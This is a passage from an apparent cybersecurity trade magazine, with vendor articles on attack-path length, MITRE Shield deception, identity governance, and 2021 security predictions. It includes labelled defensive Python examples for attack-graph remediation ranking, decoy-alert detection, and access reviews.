● Keylogging can return $723 a month for as little as a $183 investment.
● More sophisticated attacks costing a few thousand dollars could return as much as $1 million per month.

Yet whether you're dealing with an amateur equipped with cheap darknet malware or a sophisticated Advanced Persistent Threat, one thing doesn't change: Nobody wants to waste time on hard targets. The shortest path is always the most attractive.

Five Steps -- Or Less -- From Danger Attackers have many paths they can choose to target specific assets. Defenders, meanwhile, must try to visualize and map all the variables related to those paths and manage any vulnerabilities -- certainly no small task. Hardening the environment by reducing the number of obvious pathways is vitally important, as many attackers will simply move on to the next target when faced with a resilient security posture. Attackers are just as concerned about efficiency and ROI as any conventional business.

This means that organizations that can build security robust enough to require a long procession of steps are best positioned to deter attacks. Verizon's 2020 DBIR shows that the average breach requires fewer than five steps, and beyond 20 steps attacks occur far less frequently. Interestingly, hacking and malware-based attacks are highly overrepresented among attacks requiring more than 10 steps, while attacks based on errors, misuse or social paths cluster within the fewer-than-five-steps category. Adversaries prefer short paths and rarely attempt longer or more complex attacks; the numbers attest to this. Any action that increases the number of steps adversaries must take therefore reduces the odds of a successful breach.

What Organizations Can Learn From This Deterring attackers often comes down to one thing: Being a harder target than the next guy. Adversaries will typically take the path of least resistance. In practical terms, this means focusing on a few key areas:

● Creating a true security culture within your organization. It's essential to create buy-in from the C suite on down. Every strategic decision should be viewed, in part, through the lens of cybersecurity.
● Human error -- the kind that can compromise critical assets in a few short steps -- is inevitable. Raising awareness of best security practices through routine training will only do so much before returns begin diminishing. One way to manage this risk is to commit to a security posture focused on continuous improvement.
● Automated penetration testing (using tools such as breach and attack simulation software) can help develop a harder and more resilient security environment. By continuously probing your own defenses for vulnerabilities, you can uncover gaps before they are exploited and wrest the initiative from attackers -- making the battle of cybersecurity less asymmetrical.


● Gaining insight into how attackers can move laterally to compromise your assets is a core challenge. Determine how many steps would it take and what remediation steps will close the attack path. Again, automated penetration testing tools that provide prioritized remediation recommendations can be helpful in this regard.
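As an added example (not from the article or from XM Cyber's product), the following Python models the step-counting idea on a small constructed attack graph: breadth-first search gives the number of attacker steps from an Internet foothold to each crown-jewel asset, and trying the removal of every edge in turn ranks which single remediation lengthens or closes the attack path the most. System names and edges are assumptions for the example.

```python
from collections import deque

# Constructed attack graph: each node is a system or identity an attacker can
# hold, each edge is one attacker step (an exploit, a reused credential, a trust
# relationship). All names and edges are assumptions for this example.
GRAPH = {
    "internet":  ["vpn-gw", "mail-gw"],
    "vpn-gw":    ["ws-hr-07"],
    "mail-gw":   ["ws-hr-07", "ws-eng-12"],   # phishing lands on either workstation
    "ws-hr-07":  ["file-srv", "ad-dc"],       # cached domain-admin credential on the HR box
    "ws-eng-12": ["jump-host"],
    "jump-host": ["build-srv"],
    "build-srv": ["code-repo"],
    "file-srv":  ["ad-dc"],
    "ad-dc":     ["crown-db", "code-repo"],
    "crown-db":  [],
    "code-repo": [],
}
CROWN_JEWELS = ("crown-db", "code-repo")
UNREACHABLE = 100  # stand-in distance when no path exists at all


def shortest_paths(graph, start):
    """Breadth-first search: node -> shortest path (list of nodes) from start."""
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in graph.get(node, []):
            if nxt not in paths:
                paths[nxt] = paths[node] + [nxt]
                queue.append(nxt)
    return paths


def steps_to(graph, start="internet", targets=CROWN_JEWELS):
    """Attacker steps from the foothold to each critical asset (None when the
    asset is unreachable), together with the path that gets there."""
    paths = shortest_paths(graph, start)
    return {t: (len(paths[t]) - 1 if t in paths else None, paths.get(t)) for t in targets}


def without_edge(graph, src, dst):
    """Copy of the graph with one attacker step closed (a patch, a removed
    credential, a firewall rule)."""
    g = {k: list(v) for k, v in graph.items()}
    g[src] = [d for d in g[src] if d != dst]
    return g


def rank_remediations(graph, start="internet", targets=CROWN_JEWELS):
    """Close each edge in turn and rank edges by how many extra steps the attacker
    then needs in total to reach the crown jewels. Top entries are the choke points."""
    def total(result):
        return sum(UNREACHABLE if d is None else d for d, _ in result.values())

    base = total(steps_to(graph, start, targets))
    ranked = []
    for src, dsts in graph.items():
        for dst in dsts:
            gain = total(steps_to(without_edge(graph, src, dst), start, targets)) - base
            ranked.append((gain, (src, dst)))
    ranked.sort(key=lambda item: (-item[0], item[1]))
    return ranked


if __name__ == "__main__":
    for asset, (steps, path) in steps_to(GRAPH).items():
        print(f"{asset}: {steps} steps via {' -> '.join(path)}")
    for gain, edge in rank_remediations(GRAPH)[:3]:
        print(f"close {edge[0]} -> {edge[1]}: +{gain} total steps")
```

On this graph both crown-jewel assets are four steps from the Internet, which is the "fewer than five" situation the DBIR describes. Closing the HR workstation's cached-credential path to the domain controller adds only one step to each asset, because an alternate route exists through the file server, while the top-ranked edge is the one whose removal makes an asset unreachable. Two simplifications to revisit on a real environment: every step is treated as equally costly here, and a production graph has thousands of edges, so the exhaustive one-edge-at-a-time search should give way to pruning or to removing sets of edges.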

In Conclusion Given that critical assets are often just a handful of steps from danger, it's imperative to harden your security environments and work toward continuous improvement. For more information on this topic, I heartily recommend a recent webinar hosted by Security Scorecard that delves into these issues in greater detail.

About the Author

Gus Evangelakos is the Director of North American Field Engineering at XM Cyber. He has extensive experience in cybersecurity, having managed implementations and customer success for many major global brands such as Varonis, Bromium and Comodo. Gus has also spent a decade working on the client side, supporting IT infrastructure and cybersecurity projects. He has a strong background in micro virtualization, machine learning, deep learning (AI), sandboxing, containment, HIPS, AV, behavioral analysis, IOCs, and threat intelligence. Gus can be reached online via LinkedIn and at our company website http://xmcyber.com/


Moving to Active Defense: What It Means, How It Works and What You Can Do Now By Ofer Israeli, CEO and founder, Illusive Networks

Despite the myriad cybersecurity solutions out there, breaches, attacks and exploitations continue. The old approach isn’t working; cybersecurity teams need to move from a passive approach to one that’s more active. MITRE’s introduction of Shield addresses this directly. MITRE, the federally funded not-for-profit, has made it clear that active defense, rather than the standard whack-a-mole responsive defense, is paramount in the fight against cybercrime.

With the release of their Shield framework, MITRE has shifted the cybersecurity focus to active defense techniques. Government IT teams that know the latest strategies and recommendations put their agencies in a strong position to remain secure.


MITRE Shield introduces active defense

MITRE’s goal is to “solve problems for a safer world.” Shield is an active defense knowledge base constructed from over a decade of enemy engagement. With it, MITRE is trying to gather and organize what it has been learning with respect to active defense and adversary engagement. This information ranges from “high-level, CISO-ready considerations of opportunities and objectives to practitioner-friendly discussions of the TTPs available to defenders.” MITRE hopes that Shield will encourage discussion about active defense and how defenders can use this information to get the upper hand. But what exactly does active defense mean? And what do organizations need to know?

Understanding active defense

Active defense entails the use of limited offensive action and counterattacks to prevent an adversary from taking digital territory or assets. Active defense covers a swathe of activities, including engaging the adversary, basic cyber defensive capabilities and cyber deception. Taken together, these activities enable IT teams to stop current attacks as well as get more insight into the attacker. Then they can prepare more thoroughly for future attacks.

MITRE makes it clear in its discussion of Shield that deception capabilities are a necessity in the modern security stack to truly deter and manage adversaries. In Shield’s new tactic and technique mapping, deception is prominent across eight active defense tactics—channel, collect, contain, detect, disrupt, facilitate, legitimize and test—along with 33 defensive techniques.

What agencies need to know

Government organizations are continuous targets for bad actors, whether it’s nation-state attackers seeking proprietary information or more run-of-the-mill criminals looking to cause chaos and obtain some PII they can exploit.

There is a huge amount of intellectual property within government agencies. A lot of the intellectual property created in the U.S. that is of interest to adversaries is in the DoD supply chain or is being submitted to the U.S. Patent and Trademark Office. Government agencies hold some of the most valuable and sensitive data sets, including lawsuits being handled by the Department of Justice and counterterrorism tracking in the Department of Homeland Security.

Bad actors attempt to sneak into these environments and then gain access to even more impactful information – like stealing the security clearance forms for 20 million people from the Office of Personnel Management. Analysts estimate that critical breaches of government networks have increased by a factor of three to six, depending on the targets.

Agencies also need to know and avoid the misconceptions about deception. A prevailing misconception is that deception is synonymous with honeypots, which have been around for a long time and are no longer effective. Making honeypots as realistic as possible requires a lot of management, so that if attackers engage with a honeypot they won't be able to detect that it is not a real system and therefore know they're in the middle of getting caught.

A second misconception is that deception is overly complicated and complex, with comparatively little ROI. Security organizations could enjoy the benefit of using deception technology – which is lightweight and has a low cost of maintenance – but are not engaging because they think it’s an overwhelming, complex approach that they won’t get enough value from.

The reality is that deception technology is not the same as honeypots. That’s how deception began, but it has evolved significantly since then. Today’s deception takes the breadcrumb/deceptive artifact approach that leads attackers on a false trail, which triggers alerts so that defenders can find and stop the attackers in real time. Only unauthorized users ever come across the deceptions, as they have no effect on everyday systems, so false positives are dramatically reduced. These aspects of deception technology add tremendous security and financial value to the IT security organization.
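To make the breadcrumb point concrete: a planted decoy account or decoy share has no legitimate user, so any event that touches it is a high-fidelity alert, whether or not the attempt succeeded. The Python below is an added example, not code from Illusive Networks, MITRE Shield or the article. It parses constructed key=value log lines from a fictitious file server, raises an alert for every event that references a decoy artifact, and groups the alerts by source address so the defender can see where to start. The decoy names, host, addresses and share path are all made up for the example.

```python
import re
from typing import Dict, Iterable, List

# Constructed decoy inventory (hypothetical names). Nothing legitimate uses these,
# so any reference to them in a log is suspicious by construction.
DECOY_ACCOUNTS = {"svc-backup-legacy", "admin-dr-test"}
DECOY_PATH_PREFIXES = (r"\\fileserver01\finance-archive",)

# Constructed sample log lines: "<timestamp> key=value key=value ...".
SAMPLE_LOG = [
    "2021-01-05T09:14:02Z host=fileserver01 event=logon user=alice src=10.0.4.21 result=success",
    "2021-01-05T09:15:40Z host=fileserver01 event=logon user=svc-backup-legacy src=10.0.4.77 result=failure",
    r"2021-01-05T09:15:41Z host=fileserver01 event=smb_open user=bob src=10.0.4.77 path=\\fileserver01\finance-archive\q3.xlsx result=success",
    "2021-01-05T09:16:05Z host=fileserver01 event=logon user=bob src=10.0.4.30 result=success",
]

_KV = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> Dict[str, str]:
    """Split one log line into a field dict; the first token is the timestamp."""
    ts, _, rest = line.partition(" ")
    fields = dict(_KV.findall(rest))
    fields["ts"] = ts
    return fields


def decoy_reason(ev: Dict[str, str]) -> str:
    """Return why this event touches a decoy, or '' if it does not."""
    if ev.get("user") in DECOY_ACCOUNTS:
        return f"decoy account {ev['user']} used"
    path = ev.get("path", "")
    if any(path.lower().startswith(p.lower()) for p in DECOY_PATH_PREFIXES):
        return f"decoy share {path} opened"
    return ""


def detect(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Alert on every decoy touch. Note that a failed logon with a decoy account
    still alerts: the identity itself is the tell, not the outcome."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        reason = decoy_reason(ev)
        if reason:
            alerts.append({
                "ts": ev["ts"], "host": ev.get("host", ""), "src": ev.get("src", ""),
                "user": ev.get("user", ""), "result": ev.get("result", ""),
                "reason": reason,
            })
    return alerts


def sources_of_concern(alerts: List[Dict[str, str]]) -> Dict[str, int]:
    """Count decoy touches per source address; repeat offenders sort to the top."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[a["src"]] = counts.get(a["src"], 0) + 1
    return dict(sorted(counts.items(), key=lambda kv: -kv[1]))


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for a in found:
        print(a["ts"], a["src"], a["reason"], f"(result={a['result']})")
    print("by source:", sources_of_concern(found))
```

The two ordinary logons by alice and bob produce no alerts at all, which is the low-false-positive property the paragraph describes; the one address that touched both a decoy account and a decoy share is the place an investigation begins.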

Raise your Shield

The attack surface that security teams must secure continues to expand rapidly as attacker tactics evolve – whether through nation-state attack teams, insider threats, for-hire groups or others. The forced digital transformation during the pandemic, and the long-term ramifications that have resulted from it, point to the need for a more robust approach to protecting critical assets. And this is where active defense is key. It is likely that MITRE Shield will become a standard by which to measure security proficiency. Government agencies need to expand that proficiency by adding the best practice of deception to their security mix.

About the Author

Having pioneered deception-based cybersecurity, founder and CEO of Illusive Networks Ofer Israeli leads the company at the forefront of the next evolution of cyber defense. Prior to establishing Illusive Networks, Ofer managed development teams based around the globe at Israel’s seminal cybersecurity company Software Technologies and was a research assistant in the Atom Chip Lab focusing on theoretical Quantum Mechanics. Ofer holds B.Sc. degrees in Computer Science and Physics from Ben-Gurion University of the Negev.

Ofer can be reached on Twitter @ofer_israeli and at https://www.illusivenetworks.com.


How Next-Gen Identity Governance and Administration (IGA) Fits in with Your Hybrid IT Strategy By Thomas Müller-Martin, Global Partner Technical Lead, Omada

More and more organizations are using a hybrid IT environment that combines both on-premises and cloud-based applications. The rise of remote work, driven by the pandemic, has only increased the speed of this transformation. In fact, Gartner predicts that more than 75% of midsize and large organizations will have adopted some kind of multi-cloud or hybrid IT strategy by 2021.

While this approach brings many advantages, it can also make it harder to get a transparent view of who has access to which IT systems and applications within the organization. As organizations continuously move more workloads to digital services, they will need a more solid approach to identity management. Identity Governance and Administration (IGA) has become a cornerstone of solid IT security, allowing organizations to implement processes for controlling, managing and auditing access to data, which is an important prerequisite to reduce the security risk.


The growth of hybrid IT

Cloud adoption shows no signs of slowing down – in fact, IT spending overall continues to shift to public cloud computing. Gartner analysts believe that more than 45% of IT spending on system infrastructure, infrastructure software, application software and business process outsourcing will shift from traditional solutions to cloud by 2024. The cloud has been integral for many companies’ capability to stay productive during the shift to remote work, and it also comes with plenty of other advantages – like the cost savings of not having to house an on-premises data center. That said, not every business can or should shift entirely to the cloud. Some things have to remain on-premises and as a result, hybrid IT is growing. However, these new solutions must still maintain regulatory compliance and secure collaboration across the organization and with partners and customers. They must support the rapid adoption of new digital services while respecting security and compliance. The solutions need to protect the brand and IP while acting in a complex ecosystem. The organization must therefore manage the risk while maintaining business agility and increasing efficiency.

The role of identity governance and access management

Ensuring security and staying compliant means that identity access management and identity governance are key. Migrating to the cloud creates potential exposed openings for attackers and different vulnerabilities, so organizations must revise their risk and security management. Therefore, they need to have a vision for secure cloud adoption and then establish appropriate governance. It is important to ensure that a well-functioning, future-proof architecture for identity management and access governance is implemented. This architecture should secure the organization long-term and ensure correct data flows across disparate systems and directories.

An organization must know its identities and related accounts before enabling users to access and use cloud services. Companies must make sure that federated identities from suppliers, partners or customers are governed in a proper manner. Ideally, this should happen before collaboration begins, and the correct processes must be established and implemented. Organizations should also establish “local” security mechanisms, such as access request and certification, and they must also establish policies for cloud services.

What organizations need to know

When an organization uses an IGA solution, it allows the IT department to manage and govern all user access rights across a hybrid IT environment. Among the elements IGA processes oversee are:

• audit and compliance reporting to ensure continuous risk overview
• managing access to resources across an organization’s hybrid IT environments (on-premises and cloud-based applications)
• performing access reviews and certifications across all cloud and on-premises applications
• onboarding of new employees and offboarding leavers
• a structured approach to onboarding applications
• managing access to applications on a granular level in compliance with company policies, handling of access assignment policies and provisioning

The ability to process these elements effectively lets companies ensure compliance, save money and minimize the risk of data theft by insiders and hackers. A key factor in doing this well is ensuring that business systems are only accessible to those who need to use them to do their job – the “least privilege” approach.
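As an added example of the access-review and least-privilege checks described above (not Omada's code or any IGA product's data model), the Python below runs two certification checks over a constructed set of identities and accounts spanning a hypothetical on-premises directory ("ad") and a cloud application ("crm-saas"): accounts with no active owner, which are offboarding gaps, and entitlements beyond what the owner's role policy allows, which are least-privilege violations. All user, role, system and entitlement names are made up for the example.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass
class Identity:
    user_id: str
    role: str
    status: str          # "active" or "left"


@dataclass
class Account:
    system: str          # hypothetical systems: on-prem "ad", cloud "crm-saas"
    user_id: str         # correlated identity; "" when the account matches nobody
    entitlements: Set[str]


# Constructed role policy: the entitlements each role may hold, per system.
ROLE_POLICY: Dict[str, Dict[str, Set[str]]] = {
    "finance-analyst": {"ad": {"finance-share-ro"}, "crm-saas": {"reports-view"}},
    "sales-rep": {"ad": set(), "crm-saas": {"reports-view", "opportunity-edit"}},
}

# Constructed identity feed (as an HR system would supply) and account inventory.
IDENTITIES = [
    Identity("alice", "finance-analyst", "active"),
    Identity("bob", "sales-rep", "active"),
    Identity("carol", "sales-rep", "left"),                         # leaver
]
ACCOUNTS = [
    Account("ad", "alice", {"finance-share-ro", "domain-admins"}),  # beyond role
    Account("crm-saas", "alice", {"reports-view"}),
    Account("crm-saas", "bob", {"reports-view", "opportunity-edit"}),
    Account("crm-saas", "carol", {"opportunity-edit"}),             # leaver, still enabled
    Account("ad", "", {"finance-share-ro"}),                        # matches no identity
]


def _owners(identities: List[Identity]) -> Dict[str, Identity]:
    return {i.user_id: i for i in identities}


def find_orphaned_accounts(identities: List[Identity], accounts: List[Account]) -> List[Account]:
    """Accounts whose owner has left or cannot be correlated: offboarding gaps."""
    owners = _owners(identities)
    return [a for a in accounts
            if a.user_id not in owners or owners[a.user_id].status != "active"]


def find_excess_entitlements(identities: List[Identity],
                             accounts: List[Account]) -> List[Tuple[str, str, List[str]]]:
    """Entitlements held beyond the owner's role policy: least-privilege violations."""
    owners = _owners(identities)
    findings = []
    for a in accounts:
        owner = owners.get(a.user_id)
        if owner is None or owner.status != "active":
            continue                          # reported by find_orphaned_accounts
        allowed = ROLE_POLICY.get(owner.role, {}).get(a.system, set())
        excess = sorted(a.entitlements - allowed)
        if excess:
            findings.append((a.user_id, a.system, excess))
    return findings


def build_review(identities: List[Identity], accounts: List[Account]) -> List[Dict[str, str]]:
    """Turn both checks into the items a reviewer must certify or revoke."""
    items = []
    for a in find_orphaned_accounts(identities, accounts):
        items.append({"action": "disable-account", "system": a.system,
                      "user": a.user_id or "<uncorrelated>",
                      "detail": ", ".join(sorted(a.entitlements))})
    for user, system, excess in find_excess_entitlements(identities, accounts):
        items.append({"action": "revoke-entitlements", "system": system,
                      "user": user, "detail": ", ".join(excess)})
    return items


if __name__ == "__main__":
    for item in build_review(IDENTITIES, ACCOUNTS):
        print(item)
```

The review produces three items from the constructed data: carol's cloud account survives her departure, an on-premises account correlates to no identity at all, and alice holds an administrative group her role never permitted. Run against a real feed this is the recurring certification step the list above describes; an uncorrelated account is treated as an orphan deliberately, since an account nobody owns cannot be certified by anyone.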

Take control

As cloud adoption soars, hybrid IT shows no sign of slowing down. Market forces have converged to make this standard operating procedure. But that means, for regulatory and security reasons, organizations must get control of who has access to which parts of their distributed business systems.

To ensure security, compliance and efficiency, businesses need IGA processes in place. These processes protect organizations from incidents that could damage their reputation or, in the worst case, cause them to go out of business. In the era of the cloud, with skyrocketing cyber threats and stringent legislation such as GDPR, having best practice IGA processes in place has become a license to operate. Implementing an IGA solution should be seen as a strategic investment, empowering organizations to realize significant business value.

About the Author

Thomas Müller-Martin is Global Partner Technical Lead at Omada. He has spent more than 15 years in identity and access management. As the implementation of identity-centric cybersecurity strategies becomes more and more relevant for enterprises around the globe, he helps Omada partners to make their Identity Governance and Administration journey a success. Thomas can be reached online via LinkedIn and omada.net.


Analytics & Security Insight On 2021 And Beyond Predictions for the Future of the Security Space By Billy Spears, Chief Information Security Officer, Alteryx

2020 has been a year unlike any other, with unforeseen challenges creating hurdles for businesses in every sector of the economy. As companies look for ways to insulate themselves from future shocks while preparing for the year ahead, insider insights can help companies to understand how societal and economic trends have impacted and will impact their industries and what to expect in 2021. Below, I share a few predictions that will help leaders stay ahead of the curve and tackle anything that 2021 throws at them.

First, I believe that in 2021, zero-trust security will become the new normal. The work-from-anywhere concept has created an interesting opportunity for CISOs to consider strategic approaches for managing non-traditional security risks. To accommodate this shift, we’ll see corporate security departments expanding the perimeter into associates’ homes to ensure that cyber risks are not unknowingly introduced into the corporate network. 2021 will see CISOs working with HR, further pushing to increase each associate’s cyber awareness to proactively recognize and report related risks, meaning that “zero-trust security” will be the new standard methodology for supporting associates working remotely. CISOs must adopt this model as it improves secure access to corporate resources through continuous assessment and intent-based authentication policies. Furthermore, Virtual Private Network (VPN) connections must become a default setting to increase protections for associates requiring remote access.

Additionally, citizen data scientists will play a bigger role in preventing cyber attacks in 2021. As workers everywhere become more comfortable working with data, the ability of a business to deliver value in data processing and analysis increases exponentially. Their ever-expanding skillset increases value by delivering actionable insights from terabytes of otherwise impenetrable data to help the company forecast, mitigate risk and fraud, deliver relevant products to their customers and improve cybersecurity defensiveness. Effective cybersecurity threat hunting has always been built around the constant pursuit, near capture and repeated escapes of adversaries attempting to infiltrate a corporate network. Using a powerful analytics platform that enables machine learning capabilities is crucial to detect and address cybersecurity threats more rapidly by providing security departments with the ability to examine large volumes of data to uncover trends, identify patterns and deliver actionable intelligence. With the further democratization of data, 2021 will see citizen data scientists more and more playing a key role in helping security teams enhance and simplify their cyber defense technologies by precisely detecting future attacks, proactively identifying security blind spots across the network and protecting valuable company information.


About the Author

Billy Spears is Chief Information Security Officer at Alteryx. He is responsible for overseeing enterprise cybersecurity and associated risk management practices. With a strong focus on both internal and external security, Billy ensures that Alteryx associates, customers, partners and vendors are thoroughly protected via state-of-the-art policies, processes and technologies. His passion for architecting and implementing strategic solutions that build trust, enable resilience and incorporate core principles is driving transformation and simplifying processes across the organization. Billy brings more than 20 years of experience leading and building teams in the information and security space across both the corporate world and the federal government. His strong background in information and security across different industries and verticals is critical in enforcing best practices within all areas of the business. Billy’s informed guidance and strategic approach to risk management and security efforts are instrumental in improving protections as Alteryx and the larger self-service analytics market continue to grow and expand across the globe. Prior to joining Alteryx, Billy served as executive vice president and chief information security officer at loanDepot, a market leader and online mortgage lender for consumers. While in this role, Billy helped create the first security-enabled digital home loan experience for consumers – a game-changing advancement in the mortgage business. Billy has held similar positions at companies like Hyundai Capital America, General Electric and Dell, as well as the U.S. Department of Homeland Security. He is also a veteran of the U.S. Marine Corps. Billy is an adjunct cybersecurity professor for Webster University and a member of the company advisory board for Cymatic, a web application defense platform. Billy holds a bachelor’s degree in information technology from National University and received his MBA from University of Phoenix.
Billy can be reached online on Twitter at his handle @BillyJSpears and at our company website https://www.alteryx.com/


Innovation, Automation and Securing A “Work from Anywhere” Environment In The Middle East By Mazen A. Dohaji, Vice President, India, Middle East, Turkey & Africa (iMETA), LogRhythm.

Throughout 2020, enterprises and public sector organizations across the Middle East have been managing disruption and finding new ways to work. The challenge as we begin 2021 is to not just survive but thrive in this new business environment. That requires adopting new tools and creating a secure foundation that keeps users connected and moving forward.

While many organizations have experienced lockdowns and quarantines throughout 2020, security and infrastructure teams are looking at how to provide flexible working while maintaining their cybersecurity posture. Users have shifted to a diverse and changeable working environment while cyberattacks in the Middle East have surged. The UAE saw cyberattacks increase from 43,000 in April 2020 to peaks of 120,000 in July and 123,000 in August, according to the UAE’s Telecommunications Regulatory Authority (TRA). Between April and August, there was a 186% increase in cyberattacks in the country, which tracks closely with lockdown restrictions. Organizations have to be prepared for further uncertainty in 2021 and take action to manage their risk in the long term. What they can be certain of is that cyberattacks will continue to be a pain point and have the potential to spike again in 2021.

‘Work from Anywhere’

Security Operations Center (SOC) teams should be reviewing and reflecting on 2020 and thinking about how they will support dynamic working environments that aren’t just working from home or in the office but look more like “work from anywhere” scenarios. Most organizations have evolved tremendously over the last 12 months and SOC teams need to stay in tune with current operational norms and expectations of both users and business managers. SOC teams should question the state of play for their organization in 2021 and ask if their business is prepared for a new dynamic and fluid working environment. They should ask themselves:

1. What did we learn about our systems and processes throughout 2020?
2. What changes do I need to make to optimize our approach to security in the new year?
3. How do we secure a workforce that is fluid and moving between remote and on-premises?
4. Are my security controls and infrastructure built for this, or am I taking additional risk?
5. What is the state of play for security visibility in this flexible environment?
6. How prepared are we to change and adapt in case we are ready to come back to a fully office-based operation by the summer?
7. What do our users want? How can we enable their success?
8. Where do we start with so much uncertainty?

Based on their responses, they should take action to ensure that their security posture matches the organization’s requirements and ensure it is ready to flex and adapt as needed. There are a few basic steps all organizations in the Middle East should be evaluating and prioritizing.

User Vulnerability

The first step for SOC teams across the Middle East should be to reinforce best practice within their organizations and spend time educating users about policies, guidelines and best practices. Internal communications to users drive awareness and understanding of security risks. This should be increased and combined with more training. If training took place at the beginning of the pandemic, then organizations should be revisiting this in 2021. Whether it is in the private or public sector, user-based threats, like compromised accounts, increase risk and exposure across organizations. Human nature is still a primary vulnerability in an already complex threat landscape.

Endpoint is the Bottom Line

SOC teams need new levels of visibility that are built to serve both remote and office-based working. They should be focused on the collection and correlation of endpoint, VPN and other pertinent infrastructure data like employees connecting back into the corporate network, identity and access management, as well as monitoring collaboration technologies like Office 365, Teams, Zoom, and Slack. It is about gaining visibility and control over the users’ ICT ecosystem and understanding where to, from, and how employees are authenticating and accessing data and applications. When an intrusion is suspected, they need to be able to qualify the threat and assess its potential impact. They can only do that if they have captured a wide variety of activity occurring on their endpoints and servers in real time. Every organization should be able to search rich forensic data to understand when and how the incident occurred, and then contain the compromise with an endpoint lockdown.

Automate Everything

While automating everything might not be possible today, SOC teams should be exploring automating as many processes as possible. They are capturing massive amounts of data, which has made automating security processes a necessity. Not only does it eliminate human error, it ensures that precise decisions can be made at speed. SOC automation tools reduce an organization’s time to qualify (TTQ) and mean time to respond (MTTR) to a security threat. TTQ refers to the average time it takes to determine whether an incident is benign or should be considered a threat that requires investigation. Research by the Ponemon Institute found that it took organizations an average of 280 days to identify and contain a data breach in 2020. For most private and public sector organizations, that “wait time” is way too long. In a risky and uncertain time, they can’t wait for a human to perform an action that could be executed by a Security Information and Event Management (SIEM) solution with Security Orchestration, Automation and Response (SOAR) capabilities.

Reinventing the Wheel

When it comes to visibility and automation, there’s no reason to reinvent the wheel. SOC teams don’t have to develop all of this themselves. Instead, they should look for one-click, out-of-the-box automation solutions that help them meet local compliance requirements and quickly deliver for their organizations. In markets like the Kingdom of Saudi Arabia, predefined reports and use cases can be made immediately available to organizations so they can meet local cybersecurity controls. This can be a way to quickly enhance an organization’s security posture while being able to demonstrate compliance.

It also increases cost-efficiencies and enables local organizations to bridge skills gaps in the Middle East and benefit from both local and global expertise. Pre-defined use cases and reports can make it simpler and easier to deploy and enhance security in 2021.

2021 and Beyond

Rapid digitalization across the private and public sector in the Middle East is only going to continue in 2021. The digital transformation and flexible working boom that started in 2020 will accelerate. This means that cybersecurity has to continually evolve to match the needs of rapidly changing ICT ecosystems. Adaptability and agility are critical and that starts with a secure foundation. Throughout 2021, SOC teams should review, reflect and adapt as their operational environment continues to change and unexpected events influence the threat landscape.

About the Author

Mazen A. Dohaji has worked for LogRhythm for more than 6 years, where he started as a Senior Regional Director for India, Middle East, Turkey & Africa (IMETA) and is now Vice President for IMETA. He has 26 years of IT industry experience in the Middle East region and more than 3 years in the SIEM space. Mazen is driven by market challenges and has extensive knowledge of the Middle Eastern security market. This has led him to be the trusted advisor for major government entities and large enterprises across the region. He has also won “Top Performer” awards in multiple multinational organizations including IBM (formerly Informix), HP, and McAfee.


Peer-To-Peer Cybersecurity Insights For 2021 Based on real practitioners’ experiences By Stuart Berman, IT Central Station Super User

December is typically a month when people who work in the IT field offer predictions for the coming year. 2020 has been a highly atypical year, however, so it’s a bit daunting to think about what’s coming over the horizon. Yet my company is in a unique position to engage in prognostication. We source user data directly from users in the trenches. In a year when travel has not been possible, IT professionals could not rely on the traditional get-togethers and in-person discussions to get advice and feedback from other industry experts. Online review sites such as ours have boomed as a result. With that in mind, here are five predictions for cybersecurity, based on what we are learning from real practitioners.

Countermeasures and security operations catch up with containerization and microservices—While neither containerization nor microservices are new, they have reached a level of adoption that calls for a revised approach to cloud security. I say revised, versus new, because it’s easy to get pulled into “It’s all different, trash everything you’re doing” discussions. These are traps to avoid, as are the seductive but in my view false ideas like “Firewalls are dead in the cloud. You just need good code.” No, principles like Defense in Depth don’t go away just because you’re running virtualized services in the cloud. Rather, securing containers and microservices calls for new, virtualized versions of familiar technologies like firewalls.


Automation of security processes and SecOps becomes the norm—This has also been a long time coming, but the security field has reached a point where manual processes will no longer suffice. There is just too much going on, too many threats to mitigate, too many alerts to handle. Instead, solutions like Security Orchestration, Automation and Response (SOAR) will become “must haves” in the Security Operations Center (SOC). SOAR solutions use automated “playbooks” to handle threats at a speed that people cannot possibly match by hand.

Multiple security and related systems become more deeply integrated—The need to integrate the different elements of a security program will become more pressing in 2021. This goes along with automation. As security incident response becomes automated, it will make sense to eliminate manual handoffs between the systems that power the response, e.g., the SOAR solution will connect with the IT ticketing system via Application Programming Interfaces (APIs) for generating and assigning tasks.

Security moves a lot faster—Security processes, along with the systems that support them, will start to move a lot faster in 2021. This might take the form of increased automated system updates versus manual re-installs, to name just one possible example. Automation also naturally moves processes along at a far faster clip than was previously possible.

Security partners more closely with other corporate groups—Security, as well as its close cousin, compliance, will require more collaboration between multiple groups inside an organization. With privacy, for example, there will likely be much closer coordination between legal teams and engineering. For example, to ensure the “right to be forgotten” under GDPR and CCPA, the legal team has to have a thorough understanding of how the consumer’s rights will be honored through technology. To get it right, everyone is going to have to learn to speak across organizational boundaries.
In general, I think 2021 is going to be a year when the dialogue between vendors and buyers starts to become more holistic and productive. The cloud computing trend, as well as the growth of DevSecOps and SOAR, are leading to a situation where the old “My solution is better than their solution” argument just really falls flat. We are hearing this in so many ways on the site. Buyers no longer care so much if a solution is 99% effective versus a competitor that is 98%. Good security managers want to understand how a solution will work in context, for a particular business use case. One thing is for sure: It’s going to be an interesting year. Let’s all stay safe.

About the Author

Stuart Berman, IT Central Station Super User


Transitioning to Remote Work: The Apps You’ll Need to Ensure A Productive Workforce

By Ikechukwu Nnabeze, SEO Copywriter, Traqq

The world is changing at a swift pace. A couple of years ago, remote work was an unheard-of term in the business world; it was a privilege enjoyed by a select few. However, this is no longer the case, as more organizations are embracing working from home and its associated benefits. Even workers and team leaders are now quick to sing about the many positives that it brings. Before the pandemic, working outside the office wasn’t an accepted idea among employers. However, current health risks have changed many minds. Everyone has been forced to adapt and become flexible about how things should be done. Employees who have tasted the work-from-home setup would prefer to continue if given the option. It’s true that there’s no one-size-fits-all answer when it comes to deciding the sustainability of remote work for your business. Even so, it helps to know the best apps that will help your team transition to this permanent setup. After all, there are several business risks in remote work. Fortunately, there are tech solutions that can mitigate these common problems. These modern digital apps help you to coordinate and monitor your staff, no matter their location. From time tracking software to free collaboration tools for remote teams, there are several ways to ensure productivity among your employees.


Tool to Prevent Miscommunication: Slack

